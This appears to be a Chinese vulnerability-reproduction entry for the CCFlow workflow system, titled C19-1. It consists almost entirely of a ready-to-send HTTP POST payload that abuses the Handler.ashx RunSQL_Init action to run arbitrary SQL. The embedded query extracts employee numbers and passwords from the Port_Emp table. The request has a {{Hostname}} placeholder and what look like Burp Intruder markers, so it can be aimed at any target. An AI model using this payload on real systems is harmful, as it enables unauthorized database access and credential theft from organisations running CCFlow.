C19-1驰骋-CCFlow-SQL
漏洞复现:
payload:
POST /WF/Comm/Handler.ashx?§DoType=RunSQL_Init§ HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
§Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
------123128312312389898yd98ays98d
Content-Disposition: form-data; name="SQL"
SELECT No,Pass FROM Port_Emp
------123128312312389898yd98ays98d--§